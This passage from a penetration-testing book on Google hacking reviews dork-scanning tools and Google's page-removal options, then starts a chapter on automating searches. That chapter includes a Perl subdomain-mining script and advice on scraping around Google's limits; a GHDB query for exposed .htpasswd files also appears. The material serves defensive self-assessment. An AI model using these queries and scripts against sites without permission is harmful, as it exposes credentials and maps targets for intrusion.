The signatures in SiteDigger's list should look familiar. They are very similar to the queries executed by Athena, since many of them came from the GHDB, as you can see when you compare the signature highlighted in Figure 11.19 to the much earlier signature from the GHDB, shown in Figure 11.20.
Figure 11.20 Some SiteDigger Searches Look Too Familiar
[Screenshot: the GHDB entry for the query intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c, added Tuesday, June 24, 2003.]

SiteDigger does not officially use the GHDB as its foundation, and its signature database is less than one-third the size of the GHDB, which is free to developers with attribution to the GHDB Web site. Without the addition of the signatures from the GHDB, SiteDigger suffers. Unfortunately, at the time of this writing, the current version of SiteDigger is incompatible with the GHDB. In addition, there are size constraints to the SiteDigger signature database. The developers obviously never imagined a signature database of more than 550 entries, meaning that even in its current state, the GHDB is larger than the maximum SiteDigger can handle. It is unfortunate that such an excellent tool has such obvious shortcomings.

The Export Results button on the main screen allows you to create a very nice HTML report listing the results of a scan, as shown in Figure 11.21.

Figure 11.21 SiteDigger's HTML Report
[Screenshot: a SiteDigger v1.0 HTML report with the columns CATEGORY, RESULT URL, SUMMARY, and DESCRIPTION; a note on the report states that SiteDigger currently returns only the first result for each signature query.]

The report lists the category, one result from the search, the summary of the search, and a longer description of the significance of the search. Notice that only one URL is returned. It is most unfortunate that SiteDigger only returns one URL, since this severely limits the tool's effectiveness during a penetration test. Even though you can narrow the search to a particular site or domain, weeding through false positives is part of the Google hacking experience and really can't be automated. Clicking the provided URL takes you not to the Google search page with the listed results (which would be preferred) but to the first page that matched the query. There's no easy way to get back to the Google search page from SiteDigger to check out other query results.

Despite SiteDigger's shortcomings, it is still worth using because its automation, much like Gooscan's, makes fairly quick work of large query lists.

Wikto

Wikto is another tool similar to both Athena and SiteDigger.
Like SiteDigger, Wikto requires a Google license key to be entered before you can use the GoogleHacks portion of this tool. Wikto, developed by Roelof Temmingh of Sensepost (www.sensepost.com), does far more than merely query Google. However, this book focuses only on that aspect of the tool. Figure 11.22 shows the default GoogleHacks screen.

Figure 11.22 Wikto's GoogleHacks Screen

The Wikto download does not include a copy of the GHDB but is fully compatible, as evidenced by the Load GHDB button. Simply download the latest GHDB update from http://johnny.ihackstuff.com and import it using the Load GHDB button. Once it's loaded, you will see the first box populated with the GHDB entries, as shown in Figure 11.23.

Figure 11.23 Wikto Loaded with the GHDB and Ready to Go

Wikto works in two ways. Entering your domain into the Target box is the equivalent of appending site:yourdomain.com to each of the searches. Click the Start GH button and Wikto will work its way through the GHDB, one entry at a time (see Figure 11.24).

Figure 11.24 Wikto Site Scan in Progress

Wikto displays the information about each query as it works through it, as shown in Figure 11.24. Information about the query (search string, reference ID, general description, and category) is displayed in the middle window, and returned results are displayed in the bottom window.

Wikto will also perform single queries without the site: tag. By highlighting your desired search string from the GHDB in the top window and clicking the Manual button, Wikto queries Google and returns all results found, as shown in Figure 11.25.
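The site-scoping behavior described above can be sketched in a few lines of Python. This is only an illustration of the idea and not Wikto's actual code: the function name scope_queries is hypothetical, the two sample queries are taken from earlier in this chapter, and the sketch simply appends the site: operator to each search string without sending anything to Google.

```python
def scope_queries(queries, domain=None):
    """Return the queries, each restricted to `domain` with the site: operator.

    With no domain the queries are returned unchanged, which mirrors a
    manual, unscoped search.
    """
    if not domain:
        return list(queries)
    return [f"{query} site:{domain}" for query in queries]


# Sample search strings in the style of the GHDB (used here for illustration).
sample_queries = [
    'intitle:"Index of" secring.bak',
    'inurl:"buddylist.blt"',
]

# Scoped scan: every query is limited to the target domain.
for query in scope_queries(sample_queries, "yourdomain.com"):
    print(query)
```

Keeping the scoping step separate from the query list means the same list can serve both modes: scoped to a single domain for a site scan, or passed through unchanged for a manual search.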
Figure 11.25 Wikto Manual Search Results

As you can see, the output differs only in the lower window, which displays all the results returned from the query. This is identical to going to Google.com and manually entering the search string, only Wikto is much more convenient.

The one downside to Wikto as of the time of this writing is its lack of a logging feature. Results must be manually cut and pasted if you want to save them. Despite this shortcoming, Wikto's compatibility with the GHDB and its extensive features currently make it one of the better tools available.

Getting Help from Google

So far we've looked at various ways of checking your site for potential information leaks, but what can you do if you detect such leaks? First and foremost, you should remove the offending content from your site. This may be a fairly involved process, but to do it right, you should always figure out the source of the leak, to ensure that similar leaks don't happen in the future. Information leaks don't just happen; they are the result of some event that occurred. Figure out the event, resolve it, and you can begin to stem the source of the problem. Google makes a great Web page available that helps answer some of the most commonly asked questions from a Webmaster's perspective. The "Google Information for Webmasters" page, located at www.google.com/webmasters, lists all sorts of answers to commonly asked questions.

Solving the local problem is only half the battle. In some cases, Google has a cached copy of your information leak just waiting to be picked up by a Google hacker. There are two ways you can delete a cached version of a page.
The first method involves the automatic URL removal system at http://services.google.com/urlconsole/controller. This page, shown in Figure 11.26, requires that you first verify your e-mail address. Although this appears to be a login for a Google account, Google accounts don't seem to provide you access. In most cases, you will have to reregister, even if you have a Google account. The exception seems to be Google Groups accounts, which appear to allow access to this page without a problem.

Figure 11.26 Google's Automatic URL Removal Login
[Screenshot: the registration and login form for the removal system. New accounts must be activated within 24 hours, and removing a Google Groups message requires registering with the e-mail address from which the message was posted.]

Once logged in, you will receive an e-mail verification link that, when clicked, will allow you access to the Remove URL options screen, shown in Figure 11.27. This screen provides links to various sets of instructions to help you remove pages from Google's index.

Figure 11.27 URL Removal Main Page Options
[Screenshot: the options page, offering four choices: remove pages, subdirectories, or images using a robots.txt file; remove a single page using meta tags; remove an outdated link; remove your Usenet posts from Google Groups.]

The first option allows you to point Google at a robots.txt page that exists on your site. Google will process that robots.txt file, and if it is valid, will begin the processing to remove the pages affected by that file. According to Google, these requests are usually processed within 24 hours. This option is especially handy if you have made changes to your robots.txt file and would like Google to retroactively update its database, removing any newly referenced files.

The second option allows you to remove a page based on a META tag reference. You can use this option when you discover a page that you'd like to make available to Google, but you'd prefer not to have it cached. Simply update your META tag for the document and submit the document to this removal page.

The third option is the real "Oh, crap!" page. If you find a document that absolutely, positively was not supposed to be public, first remove the document, log into the removal system, and click Remove an Outdated Link. The resulting screen, shown in Figure 11.28, allows you several options for removing the offending data. If you're really terrified of the implications of the document, click the first removal option. This option should nail everything associated with the document. The second option removes the snippet that appears on the search results page as well as the cached version of the page. The third removal option only deletes the cached version of the page, leaving the snippet on the results page.
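Before submitting a robots.txt file through the first removal option, it can help to confirm locally that the file actually excludes the pages you expect. The following is a minimal sketch using Python's standard urllib.robotparser module; the helper name blocked_paths, the sample robots.txt content, and the sample paths are all hypothetical, and Python's parser only approximates how Google's own crawler interprets the file.

```python
from urllib.robotparser import RobotFileParser


def blocked_paths(robots_txt, paths, agent="Googlebot"):
    """Return the paths that the given robots.txt text disallows for `agent`."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return [path for path in paths if not parser.can_fetch(agent, path)]


# Hypothetical robots.txt content, for illustration only.
sample_robots = """\
User-agent: *
Disallow: /private/
Disallow: /backup/
"""

# Hypothetical paths to check against the rules above.
sample_paths = ["/index.html", "/private/passwords.txt", "/backup/site.tar"]

for path in blocked_paths(sample_robots, sample_paths):
    print("disallowed:", path)
```

A check like this only shows what a well-behaved crawler is asked to skip. It does not protect the files themselves, so sensitive documents still need to be removed or placed behind authentication.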
All three of these removal options require that the original page be deleted first. According to Google, an outdated-link removal takes approximately three to five days to process.

Figure 11.28 Google's "Oh, Crap!" Removal Option
[Screenshot: the Remove an Outdated Link form. It accepts a URL only if the page no longer exists on the Web and offers three choices: remove anything associated with the URL, remove the snippet portion of the result (including the cached version), or remove the cached version only.]

The final removal option allows you to remove one of your posts from Google Groups. Unlike with the old USENET system, you can make your half-dazed 2:00 A.M. inflammatory comments to a newsgroup go away. To delete a USENET post, log in with the e-mail address from which you posted. Enter either the full Groups URL or the Message ID of the message you want to delete. This request usually takes 24 hours to process.

Summary

The subject of Web server security is too big for any one book. There are so many varied requirements combined with so many different types of Web server software, application software, and operating system software that no one book could do the topic justice. However, a few general principles can at least help you prevent the devastating effects a malicious Google hacker could inflict on a site you're charged with protecting.

First, understand how the Web server software operates in the event of an unexpected condition. Directory listings, missing index files, and specific error messages can all open up avenues for offensive information gathering. Robots.txt files, simple password authentication, and effective use of META tags can help steer Web crawlers away from specific areas of your site.
Although Web data is generally considered public, remember that Google hackers might take interest in your site if it appears as a result of a generic hacking search. Default pages, directories, and programs can serve as an indicator that there is a low level of technical know-how behind a site. Servers with this type of default information serve as targets for hackers. Get a handle on what, exactly, a search engine needs to know about your site to draw visitors without attracting undue attention as a result of too much exposure. Use any of the available tools, such as Gooscan, Athena, Wikto, or SiteDigger, to help you search Google for your site's information leaks. If you locate a page that shouldn't be public, use Google's removal tools to flush the page from Google's database.

Solutions Fast Track

A Good, Solid Security Policy

■ An enforceable, solid security policy should serve as the foundation of any security effort.
■ Without a policy, your safeguards could be inefficient or unenforceable.

Web Server Safeguards

■ Directory listings, error messages, and misconfigurations can provide too much information.
■ Robots.txt files and specialized META tags can help direct search engine crawlers away from specific pages or directories.
■ Password mechanisms, even basic ones, keep crawlers away from protected content.
■ Default pages and settings indicate that a server is not well maintained and can make that server a target.

Hacking Your Own Site

■ Use the site operator to browse the servers you're charged with protecting. Keep an eye out for any pages that don't belong.
■ Use a tool like Gooscan or Athena to assess your exposure. These tools do not use the Google API, so be aware that any blatant abuse or excessive activity could get your IP range cut off from Google.
■ Use a tool like SiteDigger or Wikto, which uses the Google API and should free you from fear of getting shut down.
■ Use the Google Hacking Database to monitor the latest Google hacking queries. Use the GHDB exports with tools like Gooscan, Athena, or SiteDigger.

Getting Help from Google

■ Use Google's Webmaster page for information specifically geared toward Webmasters.
■ Use Google's URL removal tools to get sensitive data out of Google's databases.

Links to Sites

■ http://johnny.ihackstuff.com The home of the Google Hacking Database (GHDB), the search engine hacking forums, the Gooscan tool, and the GHDB export files.
■ www.snakeoillabs.com Home of Athena.
■ www.foundstone.com/resources/proddesc/sitedigger.htm
■ www.sensepost.com/research/wikto The Wikto Scanner by Sensepost.
■ www.searchengineworld.com/robots/robots_tutorial.htm A good tutorial on using the robots.txt file.

Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com.

Q: What is the no-cache pragma? Will it keep my pages from caching on Google's servers?
A: The no-cache pragma is a META tag that can be entered into a document to instruct the browser not to load the page into the browser's cache. This does not affect Google's caching feature; it is strictly an instruction to a client's browser. See www.htmlgoodies.com/beyond/nocache.html for more information.

Q: Can you provide any more details about securing IIS?
A: Microsoft makes available a very nice IIS Security Planning Tool. Try a Google search for IIS Security Planning Tool. Microsoft also makes available an IIS 5 security checklist; Google for IIS 5 services checklist.
An excellent read pertaining to IIS 6 can be found with a query like "elements of IIS security". Also, frequent the IIS Security Center. Try querying for IIS security center.

Q: Okay, enough about IIS. What about securing Apache servers?
A: Securityfocus.com has a great article, "Securing Apache: Step-by-Step," available from www.securityfocus.com/infocus/1694.

Q: Which is the best tool for checking my Google exposure?
A: That's a tough question, and the answer depends on your needs. The most thorough way to check your Web site's exposure is to use the site operator. A query such as site:gulftech.org will show you all the pages on gulftech.org that Google knows about. By looking at each and every page, you'll absolutely know what Google has on you. Repeat this process once a week.

If this is too tedious, you'll need to consider an automation tool. A step above the site technique is Athena. Athena reads the full contents of the GHDB and allows you to step through each query, applying a site value to each search. This allows you to step through the comprehensive list of "bad searches" to see if your site is affected. Athena does not use the Google API but is not automated in the truest sense of the word. SiteDigger by Foundstone is automated, and a GHDB config file is available, giving you access to the latest hacking queries. SiteDigger has a nice reporting feature and uses the Google API, making it a friendlier alternative to the non-API tools. Gooscan is potentially the biggest Google automation offender when used improperly, since it is built on the GHDB and will crank through the entire GHDB in fairly short order. It does not use the Google API, and Google will most certainly notice you using it in its wide-open configuration.
This type of usage is not recommended, since Google could make for a nasty enemy, but when Gooscan is used with discretion and respect for the spirit of Google's no-automation rule, it is a most thorough automated tool.

As far as overall usefulness, we like Wikto. It allows for Google scanning functionality ("legal," via the API) and also incorporates a slew of host scanning features backed by the Nikto database.

Chapter 12

Automating Google Searches

by James C. Foster

Solutions in this Chapter:

■ Understanding Google Search Criteria
■ Understanding the Google API
■ Understanding Google Automation Libraries
■ Scanning the Web with Google Attack Libraries
■ Links to Sites
■ Summary
■ Solutions Fast Track
■ Frequently Asked Questions

Introduction

In a relatively short time, Google has become one of the largest collections of information in the world, certainly one of the largest freely available on the Internet. Outside the corporate anomaly and considering its founders and go-to-market strategy, it is nothing short of amazing that this Internet search powerhouse has become the de facto standard for searching the Internet for desired information. That said, Google's collected information has become more sought after than the proprietary Web-crawling algorithms, massive storage techniques, or information retrieval system that seems to offer up the requested search information in mere nanoseconds.

Similar to nearly all other high-technology industries, the niche information security industry continues to assimilate advanced algorithms for the quick determination of more accurate information. Expert systems, artificial intelligence, dynamic database-driven applications, and profiling are four of the overarching initiatives that are currently driving the security applications to the next level of automated computation.
Numerous mechanisms exist for collecting information from Google's online index of Web sites. Throughout this chapter, we discuss multiple methods for retrieving information from Google's database, including an overview of Google's API and manual Web page scraping. Manual Web page scraping is the technique of pulling out desired information from a returned Web page after a query is sent. These page-scraping techniques are quickly gaining in popularity and are currently being utilized in a number of security, information-gathering, and other gimmick search engines. Although the underlying algorithm is nearly identical, the particular implementations of the search algorithm are quite different when written in different programming languages. Last but not least, we discuss how ethical automated scanning applications can be written that do not abuse the Google site by bombarding it with queries. This will be our way of showing how page-scraping applications can be written from a "white-hat" perspective.

A note of caution: This chapter is written for programmers. You'll need a background in various programming languages to get the most from this chapter. Simpler code examples are used throughout this book.

Warning

Google's stance on automation is that Google does not approve of automated scanning outside its provided Google API. Utilizing manual page-scraping techniques violates Google's terms of service; therefore, all the information in this book is provided for educational purposes. The code and libraries included in this chapter were developed as prototypes and are meant to serve as examples only! Please review Google's Standard Terms and Conditions for the company's current searching policy.

Understanding Google Search Criteria

As you have learned, Google provides access to an extremely large database of information ascertained from online applications and Web sites.
As an end user, you have the ability to query this information in two general ways. The first is through the common search interface located on the main page at www.google.com. In general, this mechanism utilizes one or multiple words (or strings) and returns a list of the highest-rated sites with these strings. The other, less common mechanism is the advanced search page that resides on the Google Web site in a somewhat hidden form. Here is a direct Web link to the advanced Google search page in English: www.google.com/advanced_search?hl=en.

Advanced Google querying not only aids in our cause of retrieving sensitive information from the Google database, it also helps educate users on the dangers of storing potentially sensitive information on distributed applications or Web applications. This chapter dives into these intricacies.

Note

Google searching parameters are covered in detail in Chapter 1. Please refer to Chapter 1 for more information on specific Google searching parameters.

The full text of advanced and complex Google queries can be captured in one of two ways. The first and easiest is to grab the query straight from a browser's address bar after it is submitted to Google. Another method for obtaining the full query is to utilize a network traffic analyzer or sniffer.
comyadvanced_search?hl=en Google - (exploits perl "#l/usr/bln" [vj gfe 5earch Web ' ^ ^ 52 blocked -g) AutoFill I g Options ^ 0 exploits : Links 3 pel GotJgle Advanced Search Advanced Search Tips | Abcut Gcocile Find results with all of the words with the exact phrase exploits 10 results 3 #!/usr/bin ~| [ Google Search with at least one of the words perl without the words Languaye Return pages written in any language |v| jpile Format Only |v| return results of the file format lany format Date Return web pages updated in the past 3 months | v| Numeric Range Return web pages containing numbers between 1 Slid 1 1 Occurrences Return results where my terms occur anywhere in the page | v| Domain Don't 1^1 return results from the site or domain .edu 1 e. a. aooale. com. . ora Mors info SafeSearch ® No filterinci O Filter usinci SafeSearch Running an advanced query utilizing the previous Google-supplied form is not a difficult task when you are seeking information or contacts on a specific subject. Although the results of an advanced query, shown in Figure 12.2, are easy to read from a human perspective, it's quite different from a programmatic stand- point. The real issue of this seemingly simple task is magnified when you want to query Google 10,000 times and log the results for later correlation, analysis, or www. syngress.com Automating Google Searches • Chapter 12 367 reporting. At that point, automating the transmission and reception of the Google queries is no longer an option — it's mandatory. 
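The mapping from the advanced search form to a single query string can be sketched in a few lines. The following is a minimal illustration, not Google's own logic: it assumes Python 3, the helper name build_search_path is hypothetical, and the num parameter (results per page) is an assumption layered on the /search?hl=en&q=... form used elsewhere in this chapter. It only builds the request path; nothing is sent to Google.

```python
from urllib.parse import urlencode


def build_search_path(all_words, exact_phrase="", any_words="",
                      exclude_site="", num=10, lang="en"):
    """Assemble a /search path from advanced-search style fields.

    Hypothetical helper: the field names mirror the form in Figure 12.1,
    and 'num' is assumed to be the results-per-page parameter.
    """
    terms = []
    if all_words:
        terms.append(all_words)
    if any_words:
        # Several alternatives are OR-ed together; one word is used as-is.
        terms.append(" OR ".join(any_words.split()))
    if exact_phrase:
        terms.append('"%s"' % exact_phrase)
    if exclude_site:
        terms.append("-site:" + exclude_site)
    query = " ".join(terms)
    # urlencode percent-encodes characters such as ", #, ! and /.
    return "/search?" + urlencode({"hl": lang, "num": num, "q": query})


path = build_search_path("exploits", exact_phrase="#!/usr/bin",
                         any_words="perl", exclude_site=".edu")
print(path)
```

Building the path with a URL-encoding routine rather than by hand matters here because the exact phrase contains characters (#, !, /, and the quotation marks) that would otherwise be misread by the server.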
Figure 12.2 Formalized Yet Not So Normalized Advanced Google Query
[Screenshot: Google results page for the query exploits perl "#!/usr/bin" -site:.edu, showing "Results 1 - 10 of about 4,570 over the past 3 months" followed by hits from sites such as securiteam.com, k-otik.com, and packetstormsecurity.org.]

As an additional note, the latest version of Ethereal incorporates an extremely useful feature: cut and paste. You are now able to cut and paste raw packet or ASCII-converted information straight from the Ethereal analysis pane into computer memory for later use. Gaining access to packet data in older versions of Ethereal was a cumbersome task that involved saving captured streams in .PCAP format and then manually converting the data from .PCAP into plain text.

Analyzing the Business Requirements for Black Hat Auto-Googling
Although we won't attempt to justify the absolute need to automate Google querying and page scraping here, we will point out that it's illegal, unethical, and in some cases, as in securing your Web site or a customer's Web site, unavoidably necessary. Google sets limitations that restrict your ability to monitor your Web applications with complete visibility. That said, we will demonstrate techniques that can be implemented to "more ethically" automate Google queries and avoid the dreaded (and alleged) Google IP blacklist.
(Supposedly, a "living" Google blacklist exists to log and limit Google service offenders, whether human or Web bot.) The following is a list of self-governing Google pen-testing ethics:

■ Implement sleep timers in your applications so that they do not affect Google's response time on a global level. For instance, do not send 10,000 Google queries as fast as you can write them to the wire; sleep for 2 or 3 seconds between each transmission.
■ Do not simply mirror aged Google results. It is better to link queries to real-time results than to create an aged database of results that needs constant updating.
■ Test or query only with permission obtained from the "target" site.
■ Query intelligently, thereby minimizing the number of queries sent to Google. If you have a blanket database that you fire against all sites on Google, even though half are irrelevant, you're unnecessarily abusing the system. Why scan for Linux-based CGI vulnerabilities if the target applications or organization only implement Windows systems?

More information on Google lockouts can be found in the article located at www.bmedia.org/archives/00000109.php.

Google Terms and Conditions
The following are important links to Google's official terms and conditions as they pertain to this book and chapter:

■ Standard Searching Service Terms and Agreements: www.google.com/terms_of_service.html
■ Google API Service Terms and Agreements: www.google.com/apis/api_terms.html

Understanding the Google API
The Google API or development kit was created for programmers who want to interface with Google's online "googleplex" of data. The API is a fully supported set of API calls that can be accessed or leveraged in multiple languages. The most common language to hook into the Google development API is Microsoft C# for .NET. Unfortunately, you cannot simply read a document on the API set and begin to code.
You must complete a few steps before you'll be able to utilize the Google API. As a quick note, do not bet on beating the system's limit of 1000 queries per day. When you use the Google API, each query is accompanied by the Google API key. A local Google cache database keeps track of each key's usage to ensure that in any sliding 24-hour window, a key is not sent more than 1000 times. The following steps outline Googling as Google intended:

1. Download the development kit at www.google.com/apis/.
2. Register to create a new Google API developer account:
   ■ www.google.com/accounts/NewAccount?continue=http://api.google.com/createkey&followup=http://api.google.com/createkey
   ■ Be prepared to provide your e-mail address, which will end up being your username, and a secure password, as shown in Figure 12.3.

Note
You will be required to verify the supplied e-mail address before your account license will be created and sent to you.

Figure 12.3 Creating a Google Development API Account
[Screenshot: the Google Accounts registration page in Internet Explorer.]

Reading Google API Results Responses
The following is a list of the Google API results that can be ascertained from the supplied methods. Each of these properties can be directly accessed once a Google search request has been successfully completed:

■ <URL>

As we have discussed, the Google Development APIs come with a slew of limitations. From a developer's perspective, some of these limitations are more apparent and devastating than others. For instance, the well-known limit of 1000 queries per day will restrict your ability to fully test your Google footprint; however, the maximum of 10 results per query will also limit your ability to test or fingerprint the Internet for certain vulnerabilities.
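To see how quickly these two limits interact, the arithmetic can be worked through in a short sketch. This is only an illustration in Python 3 under stated assumptions: the constant and function names are hypothetical, and the 1000-result ceiling per search is taken from this chapter's table of API limitations rather than from any current Google documentation.

```python
QUERIES_PER_DAY = 1000          # daily per-key limit described in this chapter
RESULTS_PER_QUERY = 10          # maximum results returned by one API call
MAX_RESULTS_PER_SEARCH = 1000   # assumed ceiling on results for one search


def calls_needed(wanted_results):
    """Number of API calls required to page through wanted_results hits."""
    capped = min(wanted_results, MAX_RESULTS_PER_SEARCH)
    # Integer ceiling division; at least one call is always spent.
    return max(1, (capped + RESULTS_PER_QUERY - 1) // RESULTS_PER_QUERY)


def searches_per_day(wanted_results):
    """How many distinct searches of that depth fit into one day's quota."""
    return QUERIES_PER_DAY // calls_needed(wanted_results)


for depth in (10, 30, 1000):
    print(depth, calls_needed(depth), searches_per_day(depth))
```

Under these assumptions, paging through all 1000 reachable results of a single search costs 100 calls, so only 10 such searches fit into one day's quota, which is why the results-per-query limit hurts as much as the daily limit.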
The full listing of Google API limitations as seen by Google Labs is displayed in Table 12.6.

Table 12.6 Google API Limitations

Component                                 Limitation
Search request length                     2048 bytes
Maximum words utilized to form a query    10
Maximum sites (site:) in a query          1
Maximum results per query                 10
Maximum results                           1000

Sample API Code
Before we dig into the API code, we must meet a few requirements that are common to most Perl-based Google querying scripts. These are the same requirements we covered in Chapter 4, but we'll list them again for convenience. In order to use this tool, you must first obtain a Google API key from www.google.com/apis. Download the developer's kit, copying the GoogleSearch.wsdl file into the same directory as this script. Next, download and install the expat package from sourceforge.net/projects/expat. This installation will require a ./configure and a make, as is typical with most modern UNIX-based installers. This script also uses SOAP::Lite, which is easiest to install via CPAN. Simply run CPAN from your favorite flavor of UNIX, and issue the following commands from the CPAN shell to install SOAP::Lite and various dependencies (some of which may not be absolutely necessary on your platform):

    install LWP::UserAgent
    install XML::Parser
    install MIME::Parser
    force install SOAP::Lite

This script was written by Roelof Temmingh from SensePost (www.sensepost.com). SensePost uses this tool as part of their footprinting process, which really accentuates the power of Google for reconnaissance purposes. For more information about their techniques, try Googling for sensepost tea or sensepost obvious. The first hit for these searches brings up two excellent papers that are a great read filled with excellent information.

The script, called dns-mine.pl, is listed below:

    #!/usr/bin/perl
    #
    # Google DNS name / sub domain miner
    # SensePost Research 2003
    # roelof@sensepost.com
    #
    # Assumes the GoogleSearch.wsdl file is in same directory
    #
    #Section 1
    use SOAP::Lite;
    if ($#ARGV < 0) {
        die "perl dns-mine.pl domainname\ne.g. perl dns-mine.pl cnn.com\n";
    }
    my $company = $ARGV[0];
    ####### You want to edit these four lines: ##############
    $key = "YOUR GOOGLE API KEY HERE";
    @randomwords = ("site", "web", "document", "internet", "link", "about", $company);
    my $service = SOAP::Lite->service('file:./GoogleSearch.wsdl');
    my $numloops = 3;   #number of pages - max 100
    #########################################################

    #Section 2
    ## Loop through all the words to overcome Google's 1000 hit limit
    foreach $randomword (@randomwords) {
        print "\nAdding word [$randomword]\n";
        #method 1
        my $query = "$randomword $company -www.$company";
        push @allsites, DoGoogle($key, $query, $company);
        #method 2 (reuses $query rather than declaring it a second time)
        $query = "-www.$company $randomword site:$company";
        push @allsites, DoGoogle($key, $query, $company);
    }

    #Section 3
    ## Remove duplicates
    @allsites = dedupe(@allsites);
    print STDOUT "\n\nDNS names:\n\n";
    foreach $site (@allsites) {
        print STDOUT "$site\n";
    }

    #Section 4
    ## Check for subdomains
    foreach $site (@allsites) {
        my $splitter = "." . $company;
        # Note: the dots in $splitter are treated as regex wildcards here
        my ($frontpart, $backpart) = split(/$splitter/, $site);
        if ($frontpart =~ /\./) {
            @subs = split(/\./, $frontpart);
            my $temp = "";
            for (my $i = 1; $i <= $#subs; $i++) {
                $temp = $temp . ($subs[$i] . ".");
            }
            push @allsubs, $temp . $company;
        }
    }
    print STDOUT "\n\nSub domains:\n\n";
    @allsubs = dedupe(@allsubs);
    foreach $sub (@allsubs) {
        print STDOUT "$sub\n";
    }

    #Section 5
    ############ subs ##########
    sub dedupe {
        my (@keywords) = @_;
        my %hash = ();
        foreach (@keywords) {
            $_ =~ tr/A-Z/a-z/;     # lowercase each entry
            chomp;
            if (length($_) > 1) { $hash{$_} = $_; }   # hash keys are unique
        }
        return keys %hash;
    }

    #Section 6
    sub parseURL {
        my ($site, $company) = @_;
        if (length($site) > 0) {
            # capture the host name between "://" and the next ":" or "/"
            if ($site =~ /:\/\/([\.\w]+)[\:\/]/) {
                my $mined = $1;
                if ($mined =~ /$company/) {
                    return $mined;
                }
            }
        }
        return "";
    }

    #Section 7
    sub DoGoogle {
        my ($GoogleKey, $GoogleQuery, $company) = @_;
        my @GoogleDomains = ();
        for ($j = 0; $j < $numloops; $j++) {
            print STDERR "$j ";
            my $results = $service->doGoogleSearch($GoogleKey, $GoogleQuery,
                (10 * $j), 10, "true", "", "true", "", "latin1", "latin1");
            # number of results on this page
            my $re = scalar @{ $results->{resultElements} };
            foreach my $result (@{ $results->{resultElements} }) {
                my $site = $result->{URL};
                my $dnsname = parseURL($site, $company);
                if (length($dnsname) > 0) {
                    push @GoogleDomains, $dnsname;
                }
            }
            if ($re != 10) { last; }   # a short page means no more results
        }
        return @GoogleDomains;
    }

Source Documentation
The Google_DNS_Mine Perl script utilizes the Google Development API through the Perl SOAP module. The script was created to identify and retrieve all of the subdomains and DNS names associated with a particular parent Web site. The links and strings retrieved would be extremely useful for anyone seeking to identify directories, CGI bins, or subdomains that could later be utilized or leveraged when penetration testing.

Section 1 declares the variables and arrays for the script in addition to specifying the modules required. The second section of the script loops through the random word engine, querying Google for multiple search terms.
All sites and subdomains that are found within the response pages are then pushed to an array (@allsites). The random words, company, and key variables were defined in Section 1.

The third section of the script was created for ease of use and educational purposes only. It serves two purposes. The first is to call the subfunction dedupe(), which removes duplicate sites from the array; the second is to print each unique site to STDOUT. The sites that are printed to STDOUT during this section are full strings that still contain the parent strings.

Section 4 splits the strings retrieved from the Google responses so that they contain only subdomains. Once the subdomains are properly stripped and formatted, they are pushed to the @allsubs array; then, in the same manner covered in Section 3, duplicates are removed and the results are printed to STDOUT.

The fifth section contains the dedupe() function, which removes duplicates from the array it is given. The passed argument list is copied from @_ into the @keywords array. Each keyword in the array is then converted to lowercase and its trailing newline is removed. Each keyword is stored as a hash key, which collapses duplicates, and the unique keys are returned.

The sixth section parses the host name out of each URL returned by Google. The arguments are unpacked into a site variable and a company variable. If the site string is not empty, a regular expression captures the host portion of the URL, and the company variable is then used to confirm that the captured host contains the target domain before the "mined" string is returned.

The last section of this script contains the bulk of the Google API code required to execute the query on the remote system. The subfunction accepts the GoogleKey, GoogleQuery, and company variables. The my $results line executes the Google query utilizing the SOAP service and corresponding method doGoogleSearch.
The results are then parsed and pushed to the @GoogleDomains array before being returned to the calling function.

When run, the tool launches multiple Google queries (built from the @randomwords list) that locate domain names and subdomains nested in Google result fields. These names and subdomains are output to the screen. For example, running the tool against Google.com produces the following output:

    DNS names:
    news.google.com.au
    catalogs.google.com
    www.cantfindongoogle.com
    toolbar.google.com
    services.google.com
    news.google.com
    labs1.google.com
    gmail.google.com
    adwords.google.com
    labs.google.com
    froogle.google.com
    api.google.com
    print.google.com
    answers.google.com
    desktop.google.com
    local.google.com
    directory.google.com

    Sub domains:
    cantfindo.google.com

This tool provides excellent mapping data for a penetration test, and the results can be extended by increasing the $numloops variable.

Tools and Traps...
Foundstone's SiteDigger
Kudos to the Foundstone consulting team for their slick Windows interface for assessing Web sites. Their tool "plays by the rules," since they do require you to obtain a Google developer license key to power the scanning portion of the application. The upside to this method and to utilizing this tool is that you are doing no wrong (provided that you have permission to query-bang a site); the downside is that you are limited to 1000 queries per day. As you can imagine, these 1000 queries could go rather quickly if you were to scan more than one site or if you wanted to run multiple scans on an individual site. It is only a matter of time until the GoogleDork DB is larger than 1000 queries. This tool can be downloaded from Foundstone's homepage at www.foundstone.com under the Resources link. Foundstone's SiteDigger Win32 interface is shown in Figure 12.5.
Also consider the Wikto tool from SensePost (www.sensepost.com), which allows for Google searching and more specific Web server testing.

Figure 12.5 SiteDigger Win32 Interface
[Screenshot: Foundstone SiteDigger v1.0 showing the Results and Signatures tabs, the Search, Stop, and Export Results buttons, a result in the ERROR MESSAGES category, and the field for entering a Google license key.]

Understanding Google Attack Libraries
Google attack libraries refer to our (Google Pen Testers) code that has been created to help teach how applications and tools can query the Google database, retrieve results, and scrape through those results. At the onset of this endeavor, we decided that we should first create a list of goals that we want our codebase to adhere to, as well as a list of challenges that we should acknowledge:

1. Execute queries against the Google database without using its Google Development API.
2. Retrieve specific results from the executed Google queries.
3. Parse and scrape through results to provide useful information to the calling program.
4. Utilize components in the particular implementations that use the inherent advantages of each language.
5. Code efficiently.

Pitfalls:
1. Inaccurate development could lead to poor results.
2. Avoid unstable response parsing that is too static to interpret atypical Google page responses.
3. Avoid lengthy or buggy socket code that utilizes too many socket connections or does not close them at the appropriate times.
4. Avoid poor query cannon development that will not handle complex or lengthy Google queries.
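The second pitfall, parsing that is too static, can be illustrated with a small sketch. This is a hedged example in Python 3, not the chapter's own library: the function name parse_total_hits and the sample strings are hypothetical, and the only thing taken from the chapter is the "of about" landmark that precedes the hit count on a results page. The point is that the parser returns None instead of failing when the landmark is missing.

```python
import re

# Landmark used in this chapter: "of about", optionally followed by a <b> tag.
_HITS = re.compile(r"of\s+about\s+(?:<b>)?\s*([0-9][0-9,.]*)", re.IGNORECASE)


def parse_total_hits(page):
    """Return the total hit count as an int, or None if it cannot be found."""
    if isinstance(page, bytes):
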